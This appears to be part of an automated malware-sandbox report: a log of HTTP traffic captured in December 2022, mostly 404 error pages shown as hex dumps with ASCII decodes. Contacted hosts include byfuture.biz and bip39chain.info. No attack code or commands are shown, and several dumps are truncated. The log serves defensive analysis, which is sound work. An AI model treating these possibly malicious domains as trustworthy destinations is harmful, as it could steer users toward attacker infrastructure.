76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 31 32 34 30 70 78 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 36 30 70 78 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 36 30 70 78 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 32 3
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 27 Dec 2022 09:54:34 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 27 Dec 2022 09:54:37 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 27 Dec 2022 09:54:59 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeServer: ApacheVary: accept-language,accept-charsetAccept-Ranges: bytesContent-Language: enExpires: Tue, 27 Dec 2022 09:54:59 GMTData Raw: 34 38 65 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 77 65 62 6d 61 73 74 65 72 40 64 69 67 69 74 61 6c 69 73 69 65 72 75 6e 67 2d 6d 69 74 2d 73 79 73 74 65 6d 2e 64 65 22 20 2f 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 2f 2a 2d 2d 3e 3c 21 5b 43 44 41 54 41 5b 2f 2a 3e 3c 21 2d 2d 2a 2f 20 0a 20 20 20 20 62 6f 64 79 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 7d 0a 20 20 20 20 61 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 43 43 3b 20 7d 0a 20 20 20 20 70 2c 20 61 64 64 72 65 73 73 20 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 33 65 6d 3b 7d 0a 20 20 20 20 73 70 61 6e 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 73 6d 61 6c 6c 65 72 3b 7d 0a 2f 2a 5d 5d 3e 2a 2f 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 68 31 3e 0a 3c 70 3e 0a 0a 0a 20 20 20 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 0a 20 20 0a 0a 20 20 20 20 54 68 65 20 6c 69 6e 6b 20 6f 6e 20 74 68 65 0a 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 63 6f 62 72 61 6d 69 65 72 65 72 2e 63 6f 6d 2f 70 36 61 32 2f 22 3e 72 65 66 65 72 72 69 6e 67 0a 20 20 20 20 70 61 67 65 3c 2f 61 3e 20 73 65 65 6d 73 20 74 6f 20 62 65 20 77 72 6f 6e 67 20 6f 72 20 6f 75 74 64 61 74 65 64 2e 20 50 6c 65 61 73 65 20 69 6e 66 6f 72 6d 20 74 68 65 20 61 75 74 68 6f 72 20 6f 66 0a 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 63 6f 62 72 61 6d 69 65 72 65 72 2e 63 6f 6d 2f 70 36 61 32 2f 22 3e 74 68 61 74 20 70 61 67 65 3c 2f 61 3e 0a 20 20 20 20 61 62 6f 75 74 20 74 68 65 20 65 72 72 6f 72 2e 0a 0a 20 2
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 27 Dec 2022 09:55:01 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeServer: ApacheVary: accept-language,accept-charsetAccept-Ranges: bytesContent-Language: enExpires: Tue, 27 Dec 2022 09:55:01 GMTData Raw: 33 66 39 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 77 65 62 6d 61 73 74 65 72 40 64 69 67 69 74 61 6c 69 73 69 65 72 75 6e 67 2d 6d 69 74 2d 73 79 73 74 65 6d 2e 64 65 22 20 2f 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 2f 2a 2d 2d 3e 3c 21 5b 43 44 41 54 41 5b 2f 2a 3e 3c 21 2d 2d 2a 2f 20 0a 20 20 20 20 62 6f 64 79 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 7d 0a 20 20 20 20 61 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 43 43 3b 20 7d 0a 20 20 20 20 70 2c 20 61 64 64 72 65 73 73 20 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 33 65 6d 3b 7d 0a 20 20 20 20 73 70 61 6e 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 73 6d 61 6c 6c 65 72 3b 7d 0a 2f 2a 5d 5d 3e 2a 2f 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 68 31 3e 0a 3c 70 3e 0a 0a 0a 20 20 20 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 0a 20 20 0a 0a 20 20 20 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 0a 20 20 20 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 0a 0a 20 20 0a 0a 3c 2f 70 3e 0a 3c 70 3e 0a 49 66 20 79 6f 75 20 74 68 69 6e 6b 20 74 68 69 73 20 69 73 20 61 20 73 65 72 76 65 72 20 65 72 72 6f 72 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 0a 74 68 65 20 3c 61 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 77 65 62 6d 61 73 74 65 72 40 64 69 67 69 74 61 6c 69 73 69 65 72 75 6e 67 2d 6d 69 74 2d 73 79 73 74 65 6d 2e 64 65 22 3e 77 65 62 6d 61 73 74 65 72 3c 2f 61 3e 2e 0a 0a 3c 2f 70 3e 0a 0a 3c 68 3
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 27 Dec 2022 09:55:07 GMTContent-Length: 0Connection: closeAllow: GETAccess-Control-Allow-Credentials: trueAccess-Control-Allow-Origin: http://www.byfuture.bizAccess-Control-Expose-Headers: X-XSRF-TOKENRequest-Context: appId=cid-v1:ce9d7f2e-1df5-4b59-a003-2b983b7619edX-Builder-Tracking-Id: 1d0cbc760d724ff3a9a30b609d89cfb1Server: Viewer
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 27 Dec 2022 09:55:10 GMTContent-Length: 0Connection: closeRequest-Context: appId=cid-v1:ce9d7f2e-1df5-4b59-a003-2b983b7619edX-Builder-Tracking-Id: ba199f29b5a948a8a6421ccb62877c04Cache-Tag: www.byfuture.bizServer: Viewer
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 27 Dec 2022 09:55:16 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 37 65 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 59 cd 6f dc 44 14 bf f7 af 18 5c a1 7e c8 de cf 64 b3 d9 6c 56 40 28 14 a9 2d 95 5a 2a 55 08 a4 b1 3d 8e 47 b1 3d d6 78 bc d9 a5 ca 91 23 07 6e 48 c0 01 4e 5c 80 13 12 12 82 bf 86 4a e4 bf e0 cd ac 3f 66 6c ef 66 cb 89 8d 94 28 33 f3 de bc cf df 7b f3 76 fe d6 fb 1f 9f 3d 7f f9 f4 01 0a 45 1c 2d 6e cd cb 3f 04 fb 8b 5b 08 3e f3 98 08 8c bc 10 f3 8c 88 53 eb 93 e7 1f 38 53 ab d8 12 54 44 64 f1 6c 9d 09 12 a3 07 9c 33 3e ef 6f d6 34 d2 04 c7 e4 d4 e2 cc 65 22 b3 90 c7 12 41 12 60 94 30 9a f8 64 65 27 2c 60 51 c4 2e 2d d4 d7 2f dc 50 2d 29 b9 4c 19 17 1a dd 25 f5 45 78 ea 93 25 f5 88 a3 fe b1 11 4d a8 a0 38 72 32 0f 47 e4 74 68 a3 3c 23 5c fd 87 5d 58 48 58 29 70 26 d6 20 b0 12 4e 7e fa f7 d1 7b 38 23 e8 7e bf 5a 72 99 bf 46 af aa 7f e5 29 8f 45 8c cf d0 ed f1 78 7c 62 6c 04 a0 cb 0c 0d 0f d2 15 7a 41 b8 8f 13 6c 23 eb 21 89 96 44 50 0f a3 27 24 27 96 8d c2 72 c1 46 ef 72 90 d2 46 77 1e 53 8f b3 8c 05 02 bd c4 0f 09 bd 63 a3 0c 27 99 03 42 d3 c0 bc 22 c6 fc 9c 26 33 34 30 97 53 ec fb 34 39 87 75 34 1a c0 f5 f2 97 79 e2 92 71 df 71 39 c1 17 33 a4 fe 38 72 a5 3e 73 55 69 12 0e 4d 75 cb 2b 87 92 f1 a0 79 b3 d4 d9 c9 e8 17 64 86 46 d3 e6 a5 6a f3 92 d0 f3 10 ec 72 38 68 08 1d d1 84 38 61 b1 3b 1e e9 c4 9a 34 a3 6e e3 1f 8c a6 53 8f b4 ed 5f 5d 77 d0 bc ae b2 d1 44 ea d1 6d 56 b5 d5 dc d4 54 1c b6 54 74 c1 8a 10 5b 10 cc 82 c5 e0 7c 60 90 b1 88 fa e8 36 21 9a 78 9a 42 e3 5e 96 bb 21 e4 13 38 6c 4b 64 75 29 57 ba 61 bb 88 a5 a1 0d cd f5 8b b7 f8 d5 b0 bc 0c 70 5d 61 b8 6e 87 91 5d 16 75 c6 10 76 5d de f0 5b ce 33 99 35 10 fd a9 c9 50 90 95 70 7c e2 31 8e 05 65 10 db 39 e0 00 97 c1 b1 f3 9c a3 72 77 86 7c b0 3c e9 16 a2 3b 72 a6 13 f9 63 f2 f6 0a e9 52 00 21 41 78 bd 59 9b 0f cf 42 b6 24 0d ad f6 91 bd 66 d1 53 11 4f 24 2e 9a a2 b9 d8 bb 38 e7 0c 14 07 58 09 a6 9e eb b9 ba 08 55 6a f6 88 17 32 24 24 88 35 22 47 01 1f 84 df 60 f0 f6 0e ca 94 37 e9 aa a4 18 b6 1c 2d b5 0d 00 88 67 08 e7 82 99 f6 d2 22 64 7a a8 dd 28 a3 c7 48 eb 61 ef e0 d0 24 ad 75 75 4a 20 0d 8e e4 4f e3 98 ca ab 16 d0 15 e9 c6 21 7b f2 6c 86 c6 9d d1 19 e0 98 46 eb 19 3a 63 09 e4 22 ce 00 85 1f 51 97 6c e2 0b 3d 66 80 ff 36 7a 4c 92 88 d9 70 26 e7 94 70 1b c5 b0 9c a5 58 c7 94 ab 5b 0d cb 4b fb 2d d0 0e 2b 6e 81 15 6d b9 8e 06 28 36 8f f0 9a e5 42 2f 37 3d b0 89 13 fb ce b8 db bf 23 dd d8 5a 60 15 54 c7 dd 54 47 dd 54 9f 7a 60 9b ec f3 53 ab a0 b6 3e 6b 90 83 f7 31 00 77 44 02 d1 95 11 3d 2f 22 98 07 74 d5 44 31 b9 3c 03 44 0c bb a8 de 89 89 4f 31 62 49 b4 46 99 c7 09 49 50 65 65 9c f8 e8 6e 4c 13 80 83 ba 9c 23 70 f3 d1 61 ba ba d7 3c 87 57 cd 73 93 c9 91 3c f7 aa 3e 29 03 b2 b2 a9 6d 54 eb 72 b9 69 34 49 d2 99 4e 72 a3 b6 b9 e1 c8 07 2b 8f a4 12 bd d0 47 49 c0 0c 87 92 6a cb cc f9 0d 9e 3b 82 a5 50 39 8d 72 ad f9 b5 26 ee c5
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 27 Dec 2022 09:55:18 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingData Raw: 31 63 31 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 53 79 73 74 65 6d 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2f 2a 20 42 61 73 65 20 2a 2f 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 3a 20 31 34 70 78 20 56 65 72 64 61 6e 61 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 68 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 27 4d 69 63 72 6f 73 6f 66 74 20 59 61 48 65 69 27 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 32 30 70 78 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 6f 72 64 2d 62 72 65 61 6b 3a 20 62 72 65 61 6b 2d 77 6f 72 64 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 68 31 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 30 70 78 20 30 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 35 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 33 32 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 68 32 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 32 38 38 63 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 70 78 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 36 70 78 20 30 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 65 65 65 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 68 33 2e 73 75 62 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 32 38 38 63 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 27 Dec 2022 09:55:24 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 27 Dec 2022 09:55:26 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: ddos-guardConnection: closeSet-Cookie: __ddg1_=izJ9rUOLO5ybP6Quw3s4; Domain=.bip39chain.info; HttpOnly; Path=/; Expires=Wed, 27-Dec-2023 09:55:32 GMTcache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmldate: Tue, 27 Dec 2022 09:55:32 GMTvary: User-Agent, Accept-Encodingx-turbo-charged-by: LiteSpeedContent-Encoding: gzipTransfer-Encoding: chunkedData Raw: 32 43 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 65 54 6d 6b db 30 10 fe 3e d8 7f b8 ba 0c 56 88 63 3b 75 d8 b0 13 c3 d8 0b 1b 8c ad d0 c2 d8 47 d9 3a c7 a2 8a e4 49 97 38 d9 af df c9 79 6b 3b 0b 2c 59 3a dd 3d f7 3c e7 5b 5c 7d fa f9 f1 e1 f7 dd 67 e8 68 ad ab 57 8b 30 81 a7 bd c6 65 d4 a1 5a 75 54 64 69 fa 26 0a 47 28 24 4f 6b 24 01 46 ac d9 60 ab 70 e8 ad a3 08 1a 6b 08 0d 2d a3 41 49 ea 96 12 b7 aa c1 78 fc 98 80 32 8a 94 d0 b1 6f 04 bb cd 26 e0 3b a7 cc 63 4c 36 6e 15 2d 8d 8d 20 61 c7 a4 48 63 05 79 9a c3 0f 4b f0 c5 6e 8c 7c fd 6a 91 1c f6 17 c9 31 7e 6d e5 fe 84 b0 b1 da ba 02 ae f3 3c 2f 61 2d dc 4a 99 22 2d 5b 06 53 80 b1 6e 2d 34 64 79 bf 4b 66 69 bf 83 0f 8e 41 4c e0 2b ea 2d 92 6a 04 e3 10 c6 c7 1e 9d 6a 4b 78 92 6c 09 b5 68 1e 57 2e 00 88 4f 21 da b6 2d 03 0b 52 6d 5f f0 23 36 64 39 ba 32 f1 33 1f 51 05 e1 79 7a 81 70 47 b1 d0 6a 65 0a 68 98 2e 74 25 8c 1c 15 ef 53 46 78 4a 21 d6 d8 72 02 71 7e d8 ec ad 67 fe ac 29 44 ed ad de 10 96 40 b6 2f e0 36 44 19 4d e7 bc 62 6c 70 7c 16 5d 76 8a 78 e6 04 02 29 b1 57 7f b1 c8 e6 a3 5b ad 0c 9e 11 1f b6 46 9b e1 b0 55 5b 2d d9 29 ab c1 cc 67 41 fe d9 73 a7 71 00 11 88 2d 2f ae 19 13 7f 47 d5 33 fd ba 19 df ee ab 87 0e c1 a1 b7 1b d7 84 c5 9f 0d 7a 42 c9 95 b3 d1 92 c5 22 a8 91 01 f0 1d b0 06 a8 53 1e 58 99 2d ba ab 45 d2 b3 83 84 79 ac 8e ef 27 94 1e e4 b9 6e d3 30 9e 65 39 63 24 c7 f4 47 85 7a 21 a5 32 ab 22 94 42 80 09 a7 45 79 26 d8 a1 16 a4 b6 58 36 1a 85 63 0a a8 2b 2f 9a 9e fd 8d 99 c7 59 9a f1 ce 7f 95 72 9d bf 0b a3 ac ad 93 e8 46 53 60 43 60 e9 94 04 b7 aa c5 db 74 32 8e 69 36 bf 61 b3 5d ec 3b 21 ed 50 40 3a 1a a6 07 a3 d9 7c 3e 81 cb 2b 9d 